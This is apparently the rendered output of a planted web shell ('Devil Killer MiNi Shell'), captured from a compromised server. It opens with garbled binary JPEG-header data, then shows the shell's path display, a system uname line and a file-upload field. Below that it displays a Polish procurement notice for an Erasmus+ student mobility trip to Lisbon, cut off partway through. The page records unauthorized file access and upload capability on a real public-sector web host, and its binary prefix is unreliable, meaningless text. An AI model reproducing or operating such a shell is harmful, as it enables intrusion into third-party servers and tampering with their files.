JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240307/0023553301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „ZORGANIZOWANIE GRUPOWEJ MOBILNOŚCI EDUKACYJNEJ UCZNIÓW ZESPOŁU SZKÓŁ CENTRUM KSZTAŁCENIA ROLNICZEGO IM. JADWIGI DZIUBIŃSKIEJ W GOLĄDKOWIE” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Centrum Kształcenia Rolniczego im. J. Dziubińskiej w Golądkowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000861860</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Golądkowo 41G</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Golądkowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">06-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL922 - Ciechanowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekterariat@zsgoladkowo.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.zsgoladkowo.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „ZORGANIZOWANIE GRUPOWEJ MOBILNOŚCI EDUKACYJNEJ UCZNIÓW ZESPOŁU SZKÓŁ CENTRUM KSZTAŁCENIA ROLNICZEGO IM. JADWIGI DZIUBIŃSKIEJ W GOLĄDKOWIE” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-77848232-dc6e-11ee-9fce-3adbe5eb3a3d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00235533</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00218637/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Zorganizowanie grupowej mobilności edukacyjnej uczniów Zespołu Szkół Kształcenia Rolniczego im. Jadwigi Dziubińskiej w Golądkowie (Wyjazd nr 1).</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> ERASMUS+ w związku z realizacją akredytowanego projektu Nr 2022-1-PL01-KA121-VET-000060466 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-77848232-dc6e-11ee-9fce-3adbe5eb3a3d <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W niniejszym postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem internetowym: https://ezamowienia.gov.pl<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: Pani Anna Kwiatkowska – za pośrednictwem platformy https://ezamowienia.gov.pl w szczególnie uzasadnionych przypadkach np. w wyniku awarii działania systemu, za pośrednictwem adresu mailowego: sekterariat@zsgoladkowo.eu<br/>4. Ofertę, oświadczenia składane wraz z ofertą oraz w tym oświadczenia, o których mowa w art. 125 ust. 1 ustawy oraz podmiotowe środki dowodowe, inne oświadczenia lub dokumenty, Wykonawca składa za pośrednictwem dedykowanych formularzy dostępnych na platformie: https://ezamowienia.gov.pl. Szczegółowo informacje o środkach komunikacji elektronicznej opisano w Rozdziale IX SWZ dostępnej na stronie postępowania.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>2. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>3. Formularz ofertowy podpisuje się podpisem zaufanym lub podpisem osobistym. Rekomendowanym wariantem podpisu jest typ wewnętrzny. Podpis formularza ofertowego wariantem podpisu w typie zewnętrznym również jest możliwy, tylko w tym przypadku, powstały oddzielny plik podpisu dla tego formularza należy załączyć w polu „Załączniki i inne dokumenty przedstawione w ofercie przez Wykonawcę”. Pozostałe dokumenty wchodzące w skład oferty lub składane wraz z ofertą, które są zgodne z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone zaufanym lub podpisem osobistym, mogą być zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby opatrzone podpisem typu zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) w polu „Załączniki i inne dokumenty przedstawione w ofercie przez Wykonawcę” dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny). W przypadku przekazywania dokumentu elektronicznego w formacie poddającym dane kompresji, opatrzenie pliku zawierającego skompresowane dokument podpisem zaufanym lub podpisem osobistym, jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku podpisem zaufanym lub podpisem osobistym. Szczegółowo opisano w rozdziale IX SWZ dostępnej na stronie internetowej prowadzonego postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zespół Szkół Centrum Kształcenia Rolniczego im. Jadwigi Dziubińskiej w Golądkowie przetwarza dane zawarte w ofertach albo wnioskach o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego, znajdujące się w publicznie dostępnych rejestrach w celu prowadzenia postępowań w sprawie zamówienia publicznego na postawie przepisów ustawy z dnia 11 września 2019 r. Prawo Zamówień Publicznych (Dz. U. z 2023 poz. 1605). Wśród tych informacji mogą pojawić się dane, które na gruncie Rozporządzenia Parlamentu Europejskiego i Rady Unii Europejskiej 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej: &#34;Ogólne Rozporządzenie&#34; lub &#34;RODO&#34;), mają charakter danych osobowych.<br/>2. Zgodnie z art. 13 ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. (Dz. Urz. UE L 119 z 04.05.2016) informuję, iż:<br/>2.1. Administratorem Pani/Pana danych osobowych jest Zespół Szkół Centrum Kształcenia Rolniczego im. Jadwigi Dziubińskiej w Golądkowie, Golądkowo 41 G, 06 – 120 Winnica.<br/>2.2. Kontakt z Inspektorem Ochrony Danych – adres mailowy sekterariat@zsgoladkowo.eu<br/>3. Cele przetwarzania oraz podstawy prawne:<br/>3.1. Na podstawie Art. 6 ust. 1 lit. c przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na Administratorze Ogólnego Rozporządzenia<br/>o Ochronie Danych Osobowych z dnia 27 kwietnia 2016 r. oraz,<br/>3.2. Na podstawie Art. 6 ust. 1 lit. f jako niezbędne do celów wynikających z prawnie uzasadnionych interesów realizowanych przez administratora,<br/>3.3. celów wypełnienia innych obowiązków prawnych, ciążących na instytucji<br/>na podstawie powszechnie obowiązujących przepisów prawa.<br/>4. Pani/Pana dane osobowe przechowywane będą przez okres niezbędny do realizacji wymienianych powyżej celów:<br/>4.1. przez okres wymagany przepisami prawa,<br/>4.2. do końca okresu przedawnienia potencjalnych roszczeń z umowy,<br/>4.3. do czasu wycofania zgody na przetwarzanie danych osobowych.<br/>5. Odbiorcami Pani/Pana danych osobowych będą: organy uprawnione na podstawie przepisów prawa do otrzymania Pani /Pana danych osobowych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">6. Posiada Pani/Pan prawo do:<br/>6.1. dostępu do treści swoich danych – korzystając z tego prawa ma Pan/Pani ma możliwość pozyskania informacji, jakie dane, w jaki sposób i w jakim celu są przetwarzane,<br/>6.2. prawo ich sprostowania – korzystając z tego prawa można zgłosić do nas konieczność poprawienia niepoprawnych danych lub uzupełnienia danych wynikających z błędu przy zbieraniu czy przetwarzaniu danych,<br/>6.3. prawo do usunięcia - korzystając z tego prawa można złożyć wniosek o usunięcie danych.<br/>W przypadku zasadności wniosku dokonamy niezwłocznego usunięcia danych. Prawo to nie dotyczy jednak sytuacji, gdy dane osobowe przetwarzane są do celów związanych<br/>z wywiązywaniem się z prawnych obowiązków administratora lub do wykonania zadania realizowanego w interesie publicznym lub w ramach władzy publicznej powierzonej administratorowi,<br/>6.4. prawo do ograniczenia przetwarzania - korzystając z tego prawa można złożyć wniosek<br/>o ograniczenie przetwarzania danych, w razie kwestionowania prawidłowość przetwarzanych danych. W przypadku zasadności wniosku możemy dane jedynie przechowywać,<br/>6.5. prawo wniesienia sprzeciwu – korzystając z tego prawa można w dowolnym momencie wnieść sprzeciw wobec przetwarzania Pani/Pana danych, jeżeli są one przetwarzane na podstawie art. 6 ust. 1 lit e lub f (prawnie uzasadniony interes lub interes publiczny).<br/>Po przyjęciu wniosku w tej sprawie jesteśmy zobowiązani do zaprzestania przetwarzania danych w tym celu. W takiej sytuacji, po rozpatrzeniu Pani/Pana wniosku, nie będziemy już mogli przetwarzać danych osobowych objętych sprzeciwem na tej podstawie, chyba że wykażemy, iż istnieją ważne prawnie uzasadnione podstawy do przetwarzania danych, które według prawa uznaje się za nadrzędne wobec Pani/Pana interesów, praw i wolności lub podstawy do ustalenia, dochodzenia lub obrony roszczeń,<br/>6.6. prawo do cofnięcia zgody Pani/Pana na ich przetwarzanie - w dowolnym momencie bez wpływu na zgodność z prawem przetwarzania, w wypadku, jeżeli przetwarzania którego dokonano na podstawie zgody wyrażonej przed jej cofnięciem.<br/>7. Ma Pani/Pan prawo wniesienia skargi do organu nadzorczego, tj. do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznane zostanie, że przetwarzanie Pani/Pana danych osobowych narusza przepisy prawa.<br/>8. Podanie danych osobowych jest obligatoryjne w oparciu o przepisy prawa<br/>a w pozostałym zakresie jest dobrowolne. Podanie danych osobowych jest obligatoryjne w oparciu o przepisy prawa a w pozostałym zakresie jest dobrowolne. 5. Do spraw nieuregulowanych w SWZ mają zastosowanie przepisy ustawy z 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. 2023 poz. 1605 ze zm.).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSCKR.081.1.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zorganizowanie grupowej mobilności edukacyjnej uczniów Zespołu Szkół Centrum Kształcenia Rolniczego im. Jadwigi Dziubińskiej w Golądkowie. Mobilność jest realizowana w związku z realizacją akredytowanego projektu Nr 2021-1-PL01-KA121-VET-000060466 w ramach programu ERASMUS+. <br/>2.	Przedmiot zamówienia obejmuje kompleksową realizację usługi obejmującą zapewnienie transportu z lotniska w Lizbonie do miejsc zakwaterowania, zakwaterowanie, wyżywienie, organizację praktyk oraz realizację programu kulturalnego, zapewnienie biletów komunikacji miejskiej. Usługą objętych będzie 31 uczestników (29 uczestników oraz 2 opiekunów). <br/>3.	Usługa realizowana będzie w terminie:<br/>- zakwaterowanie i wyżywienie od 31.03.2024 r. -13.04.2024 r. – 13 noclegów, wyżywienie w dniu 31.03.2024 r. oraz w dniu 13.04.2024 r. w zależności od transferu z i na lotnisko. <br/>-	organizacja praktyk od 01.04.2024 r. do 12.04.2024 r. – 12 dni praktyk. <br/>4.	Wykonawca w ramach realizacji przedmiotu zamówienia zobowiązany jest m.in. do:<br/>a)	Znalezienia portugalskiej agencji/partnera, do którego zadań będzie należało:<br/>- zorganizowanie w Portugalii (Lizbona i okolice) praktyk dla uczniów uczących się <br/>na kierunkach: technik architektury krajobrazu – 13 uczestników, technik urządzeń i systemów energetyki odnawialnej – 16 uczestników, <br/>- zorganizowania programu kulturalnego w dni wolne od zajęć dydaktycznych, min. dwie wycieczki dla 29 uczestników i 2 opiekunów, założenia dotyczące programu kulturowego np. spacer po Lizbonie z przewodnikiem, wizyta w oceanarium, organizacja krótszej wycieczki dopuszczalna jest również w godzinach popołudniowych w dzień, w którym odbywają się praktyki np. w piątek. <br/>-	prowadzenia monitoringu w czasie mobilności, <br/>-	zapewnienie przez Wykonawcę polskojęzycznego koordynatora, który będzie dostępny w miejscu zakwaterowania, <br/>- zapewnienia opiekuna podczas praktyk, <br/>- praktyki winny odbywać się w Lizbonie lub w okolicach, w zakładach pracy – <br/>w przypadku technika architektury krajobrazu – firmy związane z urządzaniem i pielęgnacją małych obiektów architektury krajobrazu, w zakładach zajmujących się ochroną, edukacją, pielęgnacją środowiska przyrodniczego i innych podmiotach z obszaru kształcenia właściwego dla zawodu, w przypadku technika urządzeń i systemów energetyki odnawialnej – firmy zajmujące się montażem i eksploatacją systemów energetyki odnawialnej i innych podmiotach z obszaru kształcenia właściwego dla zawodu. Praktyki winny odbywać się w godzinach między 08:00 a 16:00. <br/>- praktyki zagraniczne muszą być realizowane zgodnie ze standardami/wymogami „Polskie Ramy Jakości Staży i Praktyk” dostępnymi na stronie internetowej https://www.parp.gov.pl/storage/publications/pdf/1.%20polskie_ramy_jakosci_praktyk_i_stazy_informator.pdf <br/>b)	zapewnienia transportu wszystkich uczestników z lotniska w Lizbonie do miejsc zakwaterowania oraz z miejsc zakwaterowania na lotnisko (obie strony)<br/>c) zapewnienia dla Uczestników kart komunikacji miejskiej uprawniających <br/>do podróżowania środkami komunikacji miejskiej przez cały okres trwania mobilności. <br/>d)	zapewnienia zakwaterowania dla wszystkich uczestników. <br/>e)	zapewnienia wyżywienia dla wszystkich uczestników. <br/>5.	Zamawiający wymaga, aby przy realizacji usługi w zakresie zakwaterowania spełnione zostały niżej wskazane wymagania: <br/>a)	Zakwaterowanie w apartamentach lub hotelu wraz z wyżywieniem w miejscach zamieszkania lub w wyznaczonych punktach, co oznacza, że Zamawiający dopuszcza możliwość wyżywienia w miejscu w bezpośrednim sąsiedztwie od miejsca zamieszkania. <br/>b)	Zakwaterowanie w miejscowości Lizbona i okolicach w Portugali, gdzie odbywać się będą praktyki w ramach mobilności edukacyjnych. <br/>c)	Zakwaterowanie w pokojach 1-, 2-, 3-, 4- lub wieloosobowych wedle dostępności w obiekcie, mogących pomieścić łącznie 31 uczestników (29 uczestników + 2 opiekunów). Pokoje winny być wyposażone w łóżka jednoosobowe, każdy z bezpośrednim dostępem do łazienki (wanna/prysznic, toaleta, umywalka, suszarka do włosów). Na miejscu lokowaniem Uczestników w pokojach będą zajmowali się Opiekunowie. <br/>d)	Apartamenty/hotel winny być wyposażone w bezprzewodowy Internet dostępny w całym obiekcie w tym w pokojach uczestników, TV, ogólnodostępne żelazko, pralki. <br/>e)	Obiekty, w których będą zakwaterowani uczestnicy winny zapewniać ciszę i spokój w godzinach od 22:00 do 07:00. <br/>f)	Zamawiający wymaga, aby Uczestnicy mieli zapewniony dostęp do kuchni. <br/>6.	Zamawiający wymaga, aby w odniesieniu do wyżywienie spełnione zostały niżej wskazane wymagania: <br/>a)	Wykonawca zapewni wyżywienie dla wszystkich uczestników.<br/>b)	Wykonawca zapewni wyżywienie dla wszystkich uczestników o trzech porach dnia jako śniadanie, lunch i obiadokolacja. <br/>c)	Śniadanie zapewnione będzie w formie bufetu, którego jadłospis zawierał będzie co najmniej niżej wskazane produkty spożywcze: <br/>- świeże pieczywo, masło, ser, szynka, warzywa, owoce, dżemy wieloowocowe, miód, mleko, płatki śniadaniowe, jogurty, kawa, herbata.<br/>d)	Lunch zapewniony w formie podawanego dania z dwóch dań tj. danie pierwsze zupa oraz drugie danie np. mięso/ziemniaki/surówka/ryba, zgodnie z menu przygotowanym przez organizatora. <br/>e)	Obiadokolacja zapewniona w formie bufetu, która zawierała będzie co najmniej: frytki, warzywa, jajko sadzone, ryby, różnego rodzaju mięsa, ziemniaki, napoje zimne i ciepłe. <br/>f)	Zamawiający zastrzega, że w przypadku specjalnych potrzeb żywieniowych uczestników ma prawo do modyfikacji zamówienia w zakresie wyżywienia zgodnie z wymaganiami co do diety uczestników. <br/>7.	Zamawiający informuje, że Wykonawca zobowiązany jest do prowadzenia dokumentacji usługi w formie papierowej i elektronicznej zgodnie z wzorami przekazanymi przez Zamawiającego w dniu podpisania umowy na realizację usługi. <br/>8.	Pozostałe wymagania stawiane Wykonawcom: <br/>a)	sale, w których prowadzone będą zajęcia winny być oznaczone zgodnie z wytycznymi Programu ERASMUS+, <br/>b)	praktyki odbywać się będą od poniedziałku do piątku, program kulturalny realizowany będzie w weekendy w godzinach dopasowanych do potrzeb uczestników projektu – zgodnie z wcześniej ustalonym harmonogramem, organizacja krótszej wycieczki dopuszczalna jest w dniu, w którym prowadzone są praktyki np. w piątek. <br/>c)	wszystkie zajęcia będą prowadzone w systemie stacjonarnym. <br/>d)	Wykonawca w ramach realizacji usługi zobowiązany jest do tworzenia na bieżąco dokumentacji, a następnie przekazania kompletnej dokumentacji Zamawiającemu. Dokumentacja potwierdzająca realizację usługi powinna zawierać: <br/>-Dziennik praktyk wraz z listą obecności, wymiar godzin, tematy i program zajęć z uwzględnieniem oznakowania, zdjęć, certyfikatów/zaświadczeń zgodnych z Wytycznymi Programu ERASMUS+, <br/>- Listy obecności z podpisami uczestników zajęć, <br/>- Zestawienie zbiorcze zawierające: datę godzinę i tematykę zrealizowanych zajęć. <br/>9.	Zamawiający zastrzega sobie możliwość przeprowadzenia kontroli realizacji zajęć w dowolnym czasie, a także prawo do wglądu do dokumentacji związanej z realizacją zajęć. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55000000-0 - Usługi hotelarskie, restauracyjne i handlu detalicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">63500000-4 - Usługi biur podróży, podmiotów turystycznych i pomocy turystycznej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty, Zamawiający będzie kierował się niżej wskazanymi kryteriami oceny ofert i odpowiadającymi im znaczeniami oraz będzie oceniał spełnianie kryteriów w następujący sposób.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) 